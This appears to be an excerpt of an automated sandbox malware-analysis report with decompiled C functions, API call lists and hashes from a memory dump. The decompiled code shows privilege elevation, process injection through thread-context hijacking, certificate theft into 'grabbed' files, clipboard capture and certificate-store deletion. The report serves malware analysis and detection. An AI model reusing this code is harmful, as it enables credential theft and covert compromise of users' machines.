                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: File$AllocBuffersCloseCreateFlushHandleHeapInternetObjectReadSingleWaitWrite
                • String ID:
                • API String ID: 1233354954-0
                • Opcode ID: 4abc84ec0f68d5ea7011612451a45859c485fc274f22e527342a963b6f171b32
                • Instruction ID: e79d506053f7ffdfb1374d78e525d9b90c9f02b8df8a49fd2312fd9f7de9dc44
                • Opcode Fuzzy Hash: 4abc84ec0f68d5ea7011612451a45859c485fc274f22e527342a963b6f171b32
                • Instruction Fuzzy Hash: 50218E31904248BFEB119FA09D88FEE7B79AB04345F004076F551B51E0D7758D518B29
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0040F3C3(WCHAR* _a4) {
                				void* _v12;
                				intOrPtr _v16;
                				struct _TOKEN_PRIVILEGES _v28;
                				int _t23;
                
                				_t23 = 0;
                				if(OpenThreadToken(GetCurrentThread(), 0x20, 0,  &_v12) != 0 || OpenProcessToken(0xffffffff, 0x20,  &_v12) != 0) {
                					_v28.PrivilegeCount = 1;
                					_v16 = 2;
                					if(LookupPrivilegeValueW(_t23, _a4,  &(_v28.Privileges)) != 0 && AdjustTokenPrivileges(_v12, _t23,  &_v28, _t23, _t23, _t23) != 0 && GetLastError() == 0) {
                						_t23 = 1;
                					}
                					CloseHandle(_v12);
                					return _t23;
                				} else {
                					return 0;
                				}
                			}

                APIs
                • GetCurrentThread.KERNEL32 ref: 0040F3D3
                • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,00408579,SeTcbPrivilege), ref: 0040F3DA
                • OpenProcessToken.ADVAPI32(000000FF,00000020,?,?,?,?,?,?,?,?,?,?,00408579,SeTcbPrivilege), ref: 0040F3EC
                • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 0040F410
                • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 0040F425
                • GetLastError.KERNEL32 ref: 0040F42F
                • CloseHandle.KERNEL32(?), ref: 0040F43E
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: Token$OpenThread$AdjustCloseCurrentErrorHandleLastLookupPrivilegePrivilegesProcessValue
                • String ID:
                • API String ID: 2724707430-0
                • Opcode ID: 9808f44915c8353e77b4deb8c92dc371a5df8136a0e02c3f94ef8c4451c43ed2
                • Instruction ID: 76f9c6986d007174225d6d0a11d3fa3f2352e79778f526c23601cc0702b074ff
                • Opcode Fuzzy Hash: 9808f44915c8353e77b4deb8c92dc371a5df8136a0e02c3f94ef8c4451c43ed2
                • Instruction Fuzzy Hash: 8E0140B1600208BFEB109FA18D89FEF7B7CEB14344F000136F901F15A0E73489898A39
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 83%
                			E004034F6(void* __edx, void** _a4, void** _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, void* _a32, intOrPtr _a36, intOrPtr _a40, void* _a44) {
                				struct _CONTEXT _v720;
                				void* __edi;
                				void* __esi;
                				intOrPtr _t30;
                				void* _t34;
                				void* _t35;
                				void** _t43;
                				void* _t44;
                				void* _t45;
                				void** _t48;
                				void* _t50;
                				void* _t51;
                				intOrPtr _t53;
                				void* _t63;
                
                				_t45 = __edx;
                				E00407B30();
                				_t43 = _a4;
                				_t30 =  *0x4192f4(_t43, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44);
                				_a40 = _t30;
                				if(_t30 >= 0 && (_a32 & 0x00000001) != 0 && _t43 != 0 && _a8 != 0 && E00407B3F() != 0 && GetProcessId( *_t43) != 0) {
                					_t34 = E0040797B(_t44, _t45, _t33);
                					_a44 = _t34;
                					_t61 = _t34;
                					if(_t34 != 0) {
                						_push(_t50);
                						_t35 = E00407A4C(_t44,  *_t43, _t50, _t61, _t34, 0);
                						_t48 = _a8;
                						_t51 = _t35;
                						_a32 = _t51;
                						_t53 = _t51 -  *0x4192e4 + E00407F43;
                						_v720.ContextFlags = 0x10003;
                						if(GetThreadContext( *_t48,  &_v720) == 0) {
                							L10:
                							VirtualFreeEx( *_t43, _a32, 0, 0x8000);
                						} else {
                							_t63 = _v720.Eip -  *0x419300; // 0x77e5ba60
                							if(_t63 != 0) {
                								goto L10;
                							} else {
                								_v720.Eax = _t53;
                								_v720.ContextFlags = 0x10002;
                								if(SetThreadContext( *_t48,  &_v720) == 0) {
                									goto L10;
                								}
                							}
                						}
                						CloseHandle(_a44);
                					}
                				}
                				return _a40;
                			}

                APIs
                  • Part of subcall function 00407B30: WaitForSingleObject.KERNEL32(000000FF,004034D2), ref: 00407B38
                • NtCreateUserProcess.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 00403527
                  • Part of subcall function 00407B3F: WaitForSingleObject.KERNEL32(00000000,004157E2,19367400,00000001), ref: 00407B47
                • GetProcessId.KERNEL32(?), ref: 00403563
                  • Part of subcall function 0040797B: CreateMutexW.KERNEL32(0041930C,00000001,?,0041954C,?,?,00000002,?), ref: 004079C2
                • GetThreadContext.KERNEL32(00000000,?,00000000,00000000,?,?,00000000), ref: 004035B5
                • SetThreadContext.KERNEL32(00000000,00010003,?,?,00000000), ref: 004035E6
                • VirtualFreeEx.KERNEL32(?,00000001,00000000,00008000,?,?,00000000), ref: 004035FC
                • CloseHandle.KERNEL32(?,?,?,00000000), ref: 00403605
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: ContextCreateObjectProcessSingleThreadWait$CloseFreeHandleMutexUserVirtual
                • String ID:
                • API String ID: 3545650457-0
                • Opcode ID: 51d9eb225307ef342fe61fb42978b69a208906e100850201617906c75bbfae8d
                • Instruction ID: 22c5964c75f76a32ce99ff8659c6b43bfff53b47c7aa21cfdb6c2a95c9631159
                • Opcode Fuzzy Hash: 51d9eb225307ef342fe61fb42978b69a208906e100850201617906c75bbfae8d
                • Instruction Fuzzy Hash: B5313831500109ABDF219FA5CD49FCA3FA9AF08349F044566F908B22A1C775D950DF58
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CryptAcquireContextW.ADVAPI32(00410276,00000000,00000000,00000001,F0000040,?,00410276,?,?,?,?,?,00410799,Vixuu), ref: 0040B766
                • CryptCreateHash.ADVAPI32(00410276,00008003,00000000,00000000,?,?,00410276,?,?,?,?,?,00410799,Vixuu), ref: 0040B77E
                • CryptHashData.ADVAPI32(?,00000010,00410276,00000000,?,00410276), ref: 0040B799
                • CryptGetHashParam.ADVAPI32(?,00000002,?,00000010,00000000,?,00410276), ref: 0040B7B0
                • CryptDestroyHash.ADVAPI32(?,?,00410276), ref: 0040B7C7
                • CryptReleaseContext.ADVAPI32(00410276,00000000,?,00410276,?,?,?,?,?,00410799,Vixuu), ref: 0040B7D1
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamRelease
                • String ID:
                • API String ID: 3186506766-0
                • Opcode ID: 796d0a6da0693248184ed497b3ab44bce520321113e16476a0348635df489fa7
                • Instruction ID: 74d828b2298486b8914bf1cb1418c20473313142c795c3963661a3a888f2bca5
                • Opcode Fuzzy Hash: 796d0a6da0693248184ed497b3ab44bce520321113e16476a0348635df489fa7
                • Instruction Fuzzy Hash: 4A11157590024CBFEF128FA4DD88FAE7B7CEB04784F04846AB551B22A0D77689549B28
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 43%
                			E00411A9D(char* __ecx, void* __edx, signed int _a4, signed int _a8) {
                				char _v5;
                				signed int _v12;
                				char _v20;
                				char _v64;
                				char _v552;
                				char _v556;
                				short _v588;
                				void* __ebx;
                				void* __esi;
                				signed int _t62;
                				signed int _t64;
                				signed int _t65;
                				signed short _t71;
                				signed short _t75;
                				void* _t92;
                				void* _t95;
                				void* _t97;
                				signed short _t99;
                				void* _t100;
                				void* _t101;
                				void* _t102;
                				void* _t103;
                				void* _t104;
                				void* _t105;
                				void* _t109;
                				signed int _t111;
                				char* _t112;
                				void* _t113;
                
                				_t109 = __edx;
                				_t106 = __ecx;
                				_t111 = _a4;
                				_t99 = 1;
                				_v5 = 0;
                				if( *_t111 == 0) {
                					_t97 = E0041028B();
                					 *_t111 = _t97;
                					if(_t97 == 0) {
                						return 0;
                					}
                					_v5 = 1;
                				}
                				__eflags = _a8 & 0x00000001;
                				if(__eflags == 0) {
                					L9:
                					__eflags = _a8 & 0x00000002;
                					if((_a8 & 0x00000002) != 0) {
                						_push( &_v12);
                						_push(0x20000);
                						_push(0x2713);
                						_t105 = 4;
                						_v12 = 0x2000101;
                						_t99 = E004102A7(_t111, _t105);
                					}
                					L11:
                					__eflags = _a8 & 0x00000004;
                					if((_a8 & 0x00000004) == 0) {
                						L16:
                						__eflags = _t99;
                						if(_t99 == 0) {
                							L32:
                							__eflags = _v5 - 1;
                							if(_v5 == 1) {
                								E004097F7( *_t111);
                								 *_t111 =  *_t111 & 0x00000000;
                								__eflags =  *_t111;
                							}
                							L34:
                							return _t99;
                						}
                						__eflags = _a8 & 0x00000008;
                						if((_a8 & 0x00000008) == 0) {
                							L20:
                							__eflags = _t99;
                							if(_t99 == 0) {
                								goto L32;
                							}
                							__eflags = _a8 & 0x00000010;
                							if((_a8 & 0x00000010) == 0) {
                								L28:
                								__eflags = _t99;
                								if(_t99 == 0) {
                									goto L32;
                								}
                								__eflags = _a8 & 0x00000020;
                								if((_a8 & 0x00000020) != 0) {
                									E004119E1(_t106, _t111, 2);
                									E004119E1(_t106, _t111, 0x17);
                								}
                								goto L34;
                							}
                							_t62 = GetModuleFileNameW(0,  &_v588, 0x103);
                							_a4 = _t62;
                							__eflags = _t62;
                							if(_t62 > 0) {
                								__eflags = 0;
                								 *((short*)(_t113 + _t62 * 2 - 0x248)) = 0;
                								_t106 =  &_v588;
                								_t99 = E00410354(_t62,  &_v588, _t109, 0, _t111, 0x271e);
                							}
                							_a4 = 0x104;
                							__eflags = _t99;
                							if(_t99 == 0) {
                								goto L32;
                							} else {
                								_push( &_a4);
                								_t64 =  &_v588;
                								_push(_t64);
                								_push(2);
                								L0041595C();
                								__eflags = _t64;
                								if(_t64 != 0) {
                									_t65 = _a4;
                									__eflags = _t65;
                									if(_t65 > 0) {
                										__eflags = 0;
                										 *((short*)(_t113 + _t65 * 2 - 0x248)) = 0;
                										_t106 =  &_v588;
                										_t99 = E00410354(_t65,  &_v588, _t109, 0, _t111, 0x271f);
                									}
                								}
                								goto L28;
                							}
                						}
                						_t112 =  &_v20;
                						E0040F810(_t112);
                						_push(_t112);
                						_push(0x20000);
                						_push(0x271c);
                						_t100 = 6;
                						_t71 = E004102A7(_a4, _t100);
                						_t99 = _t71;
                						__eflags = _t99;
                						if(_t99 == 0) {
                							_t111 = _a4;
                							goto L32;
                						}
                						__imp__GetUserDefaultUILanguage();
                						_v12 = _t71 & 0x0000ffff;
                						_push( &_v12);
                						_push(0x20000);
                						_push(0x271d);
                						_t101 = 2;
                						_t75 = E004102A7(_a4, _t101);
                						_t111 = _a4;
                						_t99 = _t75;
                						goto L20;
                					}
                					__eflags = _t99;
                					if(_t99 == 0) {
                						goto L32;
                					}
                					_v12 = E004098F9();
                					_push( &_v12);
                					_push(0x20000);
                					_push(0x2719);
                					_t102 = 4;
                					_t99 = E004102A7(_t111, _t102);
                					__eflags = _t99;
                					if(_t99 == 0) {
                						goto L32;
                					}
                					_v12 = E00409921();
                					_push( &_v12);
                					_push(0x20000);
                					_push(0x271b);
                					_t103 = 4;
                					_t99 = E004102A7(_t111, _t103);
                					__eflags = _t99;
                					if(_t99 == 0) {
                						goto L32;
                					}
                					_v12 = GetTickCount();
                					_push( &_v12);
                					_push(0x20000);
                					_push(0x271a);
                					_t104 = 4;
                					_t99 = E004102A7(_t111, _t104);
                					goto L16;
                				}
                				_t92 = E00407B82(_t106,  &_v556);
                				_t106 =  &_v552;
                				_t99 = E00410354(_t92,  &_v552, _t109, __eflags, _t111, 0x2711);
                				__eflags = _t99;
                				if(_t99 == 0) {
                					goto L11;
                				}
                				_t95 = E00407CC7( &_v552,  &_v64);
                				__eflags = _v64;
                				if(__eflags != 0) {
                					_t106 =  &_v64;
                					_t99 = E00410354(_t95,  &_v64, _t109, __eflags, _t111, 0x2712);
                				}
                				__eflags = _t99;
                				if(_t99 == 0) {
                					goto L11;
                				}
                				goto L9;
                			}
                0x00411a9d
                0x00411a9d
                0x00411aa8
                0x00411aaf
                0x00411ab1
                0x00411ab5
                0x00411ab7
                0x00411abc
                0x00411ac0
                0x00000000
                0x00411ac2
                0x00411ac9
                0x00411ac9
                0x00411acd
                0x00411ad6
                0x00411b1f
                0x00411b1f
                0x00411b23
                0x00411b28
                0x00411b29
                0x00411b2a
                0x00411b31
                0x00411b34
                0x00411b40
                0x00411b40
                0x00411b42
                0x00411b42
                0x00411b46
                0x00411bbb
                0x00411bbb
                0x00411bbd
                0x00411cbf
                0x00411cbf
                0x00411cc3
                0x00411cc7
                0x00411ccc
                0x00411ccc
                0x00411ccc
                0x00411ccf
                0x00000000
                0x00411ccf
                0x00411bc3
                0x00411bc7
                0x00411c15
                0x00411c15
                0x00411c17
                0x00000000
                0x00000000
                0x00411c1d
                0x00411c21
                0x00411ca0
                0x00411ca0
                0x00411ca2
                0x00000000
                0x00000000
                0x00411ca4
                0x00411ca8
                0x00411cad
                0x00411cb5
                0x00411cb5
                0x00000000
                0x00411ca8
                0x00411c31
                0x00411c37
                0x00411c3a
                0x00411c3c
                0x00411c3e
                0x00411c45
                0x00411c4e
                0x00411c59
                0x00411c59
                0x00411c5b
                0x00411c62
                0x00411c64
                0x00000000
                0x00411c66
                0x00411c69
                0x00411c6a
                0x00411c70
                0x00411c71
                0x00411c73
                0x00411c78
                0x00411c7a
                0x00411c7c
                0x00411c7f
                0x00411c81
                0x00411c83
                0x00411c8a
                0x00411c93
                0x00411c9e
                0x00411c9e
                0x00411c81
                0x00000000
                0x00411c7a
                0x00411c64
                0x00411bc9
                0x00411bcc
                0x00411bd3
                0x00411bd7
                0x00411bd8
                0x00411bdf
                0x00411be0
                0x00411be5
                0x00411be7
                0x00411be9
                0x00411cbc
                0x00000000
                0x00411cbc
                0x00411bef
                0x00411bf8
                0x00411bfe
                0x00411c02
                0x00411c03
                0x00411c0a
                0x00411c0b
                0x00411c10
                0x00411c13
                0x00000000
                0x00411c13
                0x00411b48
                0x00411b4a
                0x00000000
                0x00000000
                0x00411b55
                0x00411b5b
                0x00411b5c
                0x00411b5d
                0x00411b64
                0x00411b6c
                0x00411b6e
                0x00411b70
                0x00000000
                0x00000000
                0x00411b7b
                0x00411b81
                0x00411b82
                0x00411b83
                0x00411b8a
                0x00411b92
                0x00411b94
                0x00411b96
                0x00000000
                0x00000000
                0x00411ba2
                0x00411ba8
                0x00411ba9
                0x00411baa
                0x00411bb1
                0x00411bb9
                0x00000000
                0x00411bb9
                0x00411adf
                0x00411aea
                0x00411af5
                0x00411af7
                0x00411af9
                0x00000000
                0x00000000
                0x00411aff
                0x00411b04
                0x00411b09
                0x00411b11
                0x00411b19
                0x00411b19
                0x00411b1b
                0x00411b1d
                0x00000000
                0x00000000
                0x00000000

                APIs
                • GetTickCount.KERNEL32 ref: 00411B9C
                • GetUserDefaultUILanguage.KERNEL32(0000271C,00020000,?,00000000,00401458,00000000), ref: 00411BEF
                  • Part of subcall function 0041028B: HeapAlloc.KERNEL32(00000008,00000034,00410651,?,00000000,?), ref: 00410295
                • GetModuleFileNameW.KERNEL32(00000000,?,00000103,00000000,00401458,00000000), ref: 00411C31
                • GetUserNameExW.SECUR32(00000002,?,00000104), ref: 00411C73
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: NameUser$AllocCountDefaultFileHeapLanguageModuleTick
                • String ID:
                • API String ID: 2013068177-3916222277
                • Opcode ID: aed2331f763d9b2b691df297bec527ecfe97fb399dd8e0fcde79aa3ab4aa8b32
                • Instruction ID: 88329fb771c4ab934556611ddd143767eef196a98b56f3cddac79797cd8d865f
                • Opcode Fuzzy Hash: aed2331f763d9b2b691df297bec527ecfe97fb399dd8e0fcde79aa3ab4aa8b32
                • Instruction Fuzzy Hash: 5851093168424879D7119B65DC49FDE7BA8AF01344F04405BBA49AF3E2EB799EC4C74C
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 59%
                			E0041280F(void* __ecx, intOrPtr* _a4, intOrPtr* _a8, signed int _a12) {
                				char _v120;
                				struct _SYSTEMTIME _v136;
                				intOrPtr _v140;
                				intOrPtr _v148;
                				intOrPtr _v152;
                				char _v160;
                				void* __edi;
                				void* __esi;
                				intOrPtr _t24;
                				void* _t31;
                				void* _t42;
                				void* _t45;
                				void* _t49;
                				intOrPtr* _t50;
                				void* _t51;
                				void* _t54;
                				intOrPtr* _t55;
                				signed int _t58;
                				void* _t60;
                				void* _t61;
                
                				_t45 = __ecx;
                				_t60 = (_t58 & 0xfffffff8) - 0x8c;
                				_t24 = E00407B30();
                				_t55 = _a4;
                				__imp__PFXImportCertStore(_t55, _a8, _a12, _t51, _t54, _t42);
                				_v152 = _t24;
                				if(_t24 != 0 && (_a12 & 0x10000000) == 0 && _t55 != 0 &&  *_t55 > 0 &&  *((intOrPtr*)(_t55 + 4)) != 0 && E00407B3F() != 0) {
                					GetSystemTime( &_v136);
                					_push(_v136.wYear & 0x0000ffff);
                					_push(_v136.wMonth & 0x0000ffff);
                					_push(_v136.wDay & 0x0000ffff);
                					_push(L"grabbed");
                					_push(L"certs\\%s_%02u_%02u_%04u.pfx");
                					_t49 = 0x32;
                					_t53 =  &_v120;
                					_t31 = E0040A4B7(_v136.wDay & 0x0000ffff, _t49,  &_v120);
                					_t61 = _t60 + 0x14;
                					if(_t31 > 0 && E0041235A(_t45, _t49, 2, 0,  &_v120,  *((intOrPtr*)(_t55 + 4)),  *_t55) != 0) {
                						_t50 = _a8;
                						if(_t50 != 0 &&  *_t50 != 0) {
                							 *((short*)(E00409833(_t61 + 0x38 + E0040A3AA(_t53) * 2, L".txt", 8) + 8)) = 0;
                							_t48 = _t50;
                							if(E0040A655(_t36 | 0xffffffff, _t50,  &_v160) != 0) {
                								E0041235A(_t48, _t50, 2, 0, _t53, _v148, _v140);
                								E0040A645( &_v160);
                							}
                						}
                					}
                				}
                				return _v152;
                			}
                0x0041280f
                0x00412815
                0x0041281e
                0x00412826
                0x0041282d
                0x00412835
                0x0041283b
                0x00412879
                0x00412884
                0x0041288a
                0x00412890
                0x00412891
                0x00412896
                0x0041289d
                0x0041289e
                0x004128a2
                0x004128a7
                0x004128ac
                0x004128c2
                0x004128c7
                0x004128e8
                0x004128f3
                0x004128fc
                0x0041290c
                0x00412911
                0x00412911
                0x004128fc
                0x004128c7
                0x004128ac
                0x00412920

                APIs
                  • Part of subcall function 00407B30: WaitForSingleObject.KERNEL32(000000FF,004034D2), ref: 00407B38
                • PFXImportCertStore.CRYPT32(?,?,?), ref: 0041282D
                  • Part of subcall function 00407B3F: WaitForSingleObject.KERNEL32(00000000,004157E2,19367400,00000001), ref: 00407B47
                • GetSystemTime.KERNEL32(?), ref: 00412879
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: ObjectSingleWait$CertImportStoreSystemTime
                • String ID: .txt$certs\%s_%02u_%02u_%04u.pfx$grabbed
                • API String ID: 2161633107-874334855
                • Opcode ID: ef49be0174f5b543078943167e36c9c70ec30a831aa72ca906ef47f3357dad7c
                • Instruction ID: 15c35e2aa09bb866fd1f709b01272d2a7378d987854c41c9685648e0f7d4e531
                • Opcode Fuzzy Hash: ef49be0174f5b543078943167e36c9c70ec30a831aa72ca906ef47f3357dad7c
                • Instruction Fuzzy Hash: 0621E871A003015FCB20AF598A45ABB73A9BF44354F04452FF994F32D1C7B9D9A4D3AA
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 64%
                			E00412C03(void* _a4) {
                				signed int _t12;
                				void* _t22;
                				void* _t24;
                				void* _t25;
                				int _t26;
                
                				E00407B30();
                				_t26 = _a4;
                				_t24 = GetClipboardData(_t26);
                				_a4 = _t24;
                				if(E00407B3F() == 0) {
                					return _t24;
                				}
                				if(_t24 == 0 || _t26 != 1 && _t26 != 0xd && _t26 != 7) {
                					L20:
                					return _a4;
                				} else {
                					_t22 = GlobalLock(_t24);
                					if(_t22 == 0) {
                						L19:
                						goto L20;
                					}
                					_t12 = _t26 - 1;
                					if(_t12 == 0) {
                						_push(_t22);
                						_push(0);
                						L12:
                						_t25 = E00409A3C(_t12 | 0xffffffff);
                						L15:
                						if(_t25 != 0) {
                							EnterCriticalSection(0x41aa20);
                							E00412923(0x402be8);
                							E00412923(_t25);
                							LeaveCriticalSection(0x41aa20);
                							if(_t25 != _t22) {
                								E004097F7(_t25);
                							}
                						}
                						GlobalUnlock(_a4);
                						goto L19;
                					}
                					_t12 = _t12 - 6;
                					if(_t12 == 0) {
                						_push(_t22);
                						_push(1);
                						goto L12;
                					}
                					if(_t12 != 6) {
                						_t25 = _a4;
                					} else {
                						_t25 = _t22;
                					}
                					goto L15;
                				}
                			}
                0x00412c08
                0x00412c0d
                0x00412c17
                0x00412c19
                0x00412c23
                0x00000000
                0x00412c25
                0x00412c2e
                0x00412cb6
                0x00000000
                0x00412c43
                0x00412c4b
                0x00412c4f
                0x00412cb5
                0x00000000
                0x00412cb5
                0x00412c53
                0x00412c54
                0x00412c73
                0x00412c74
                0x00412c67
                0x00412c6f
                0x00412c7b
                0x00412c7d
                0x00412c85
                0x00412c90
                0x00412c96
                0x00412c9c
                0x00412ca4
                0x00412ca7
                0x00412ca7
                0x00412ca4
                0x00412caf
                0x00000000
                0x00412caf
                0x00412c56
                0x00412c59
                0x00412c64
                0x00412c65
                0x00000000
                0x00412c65
                0x00412c5e
                0x00412c78
                0x00412c60
                0x00412c60
                0x00412c60
                0x00000000
                0x00412c5e

                APIs
                  • Part of subcall function 00407B30: WaitForSingleObject.KERNEL32(000000FF,004034D2), ref: 00407B38
                • GetClipboardData.USER32 ref: 00412C11
                  • Part of subcall function 00407B3F: WaitForSingleObject.KERNEL32(00000000,004157E2,19367400,00000001), ref: 00407B47
                • GlobalLock.KERNEL32 ref: 00412C45
                • EnterCriticalSection.KERNEL32(0041AA20,00000000,00000000), ref: 00412C85
                • LeaveCriticalSection.KERNEL32(0041AA20,00000000,00402BE8), ref: 00412C9C
                • GlobalUnlock.KERNEL32(?,00000000,00000000), ref: 00412CAF
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: CriticalGlobalObjectSectionSingleWait$ClipboardDataEnterLeaveLockUnlock
                • String ID:
                • API String ID: 2045610074-0
                • Opcode ID: baca8da8304e929a1c2b587d9f64bb99fa7acb3b00013b0dc9e295f864dfc7c9
                • Instruction ID: 6c3a25e9a7981fa85f9f494552b61879dbff9b9baf82aa9e412f410d6be2a5b9
                • Opcode Fuzzy Hash: baca8da8304e929a1c2b587d9f64bb99fa7acb3b00013b0dc9e295f864dfc7c9
                • Instruction Fuzzy Hash: 9011C83250050167C6112F69DB885FF36199B863A4B15003BFB05F7361FABC9DE256DE
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0040B41D(WCHAR* __ecx, void* __eflags) {
                				struct _WIN32_FIND_DATAW _v596;
                				short _v1116;
                				WCHAR* _t38;
                				void* _t42;
                
                				_t38 = __ecx;
                				if(E0040B635("*",  &_v1116, __ecx) == 0) {
                					L9:
                					SetFileAttributesW(_t38, 0x80);
                					return RemoveDirectoryW(_t38) & 0xffffff00 | _t19 != 0x00000000;
                				}
                				_t42 = FindFirstFileW( &_v1116,  &_v596);
                				if(_t42 == 0xffffffff) {
                					goto L9;
                				} else {
                					goto L2;
                				}
                				do {
                					L2:
                					if(E0040B2FC( &(_v596.cFileName)) == 0 && E0040B635( &(_v596.cFileName),  &_v1116, _t38) != 0) {
                						_t51 = _v596.dwFileAttributes & 0x00000010;
                						if((_v596.dwFileAttributes & 0x00000010) == 0) {
                							E0040B1CD( &_v1116);
                						} else {
                							E0040B41D( &_v1116, _t51);
                						}
                					}
                				} while (FindNextFileW(_t42,  &_v596) != 0);
                				FindClose(_t42);
                				goto L9;
                			}
                0x0040b42b
                0x0040b43f
                0x0040b4ba
                0x0040b4c0
                0x0040b4d7
                0x0040b4d7
                0x0040b454
                0x0040b459
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0040b45b
                0x0040b45b
                0x0040b469
                0x0040b481
                0x0040b489
                0x0040b49b
                0x0040b48b
                0x0040b48f
                0x0040b48f
                0x0040b489
                0x0040b4af
                0x0040b4b4
                0x00000000

                APIs
                  • Part of subcall function 0040B635: PathCombineW.SHLWAPI(?,?,00401EC0,004076D9,?,?,?,00000000), ref: 0040B64C
                • FindFirstFileW.KERNEL32(?,?,?,?,?,?), ref: 0040B44E
                • FindNextFileW.KERNEL32(00000000,?,?,?), ref: 0040B4A9
                • FindClose.KERNEL32(00000000,?,?), ref: 0040B4B4
                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?), ref: 0040B4C0
                • RemoveDirectoryW.KERNEL32(?,?,?), ref: 0040B4C7
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: FileFind$AttributesCloseCombineDirectoryFirstNextPathRemove
                • String ID:
                • API String ID: 765042924-0
                • Opcode ID: 136229f666d12f31a5afcace9a987fc733c58848a24caa4ca0d1a8fb158e8ac1
                • Instruction ID: 75291d6f7ec19cec8aa0513e549dac43e40e3f2ae0e0aeb09e7dcbc294903311
                • Opcode Fuzzy Hash: 136229f666d12f31a5afcace9a987fc733c58848a24caa4ca0d1a8fb158e8ac1
                • Instruction Fuzzy Hash: 32118632004248AAC320EB65DD4DADB73ECDF45314F00493FF995E22D1EB7C964586AE
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CertOpenSystemStoreW.CRYPT32(00000000,00402B6C), ref: 004127CA
                • CertDuplicateCertificateContext.CRYPT32(00000000), ref: 004127E3
                • CertDeleteCertificateFromStore.CRYPT32(00000000,?,?,?,?,00407ED8), ref: 004127EE
                • CertEnumCertificatesInStore.CRYPT32(00000000,00000000), ref: 004127F6
                • CertCloseStore.CRYPT32(00000000,00000000), ref: 00412802
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
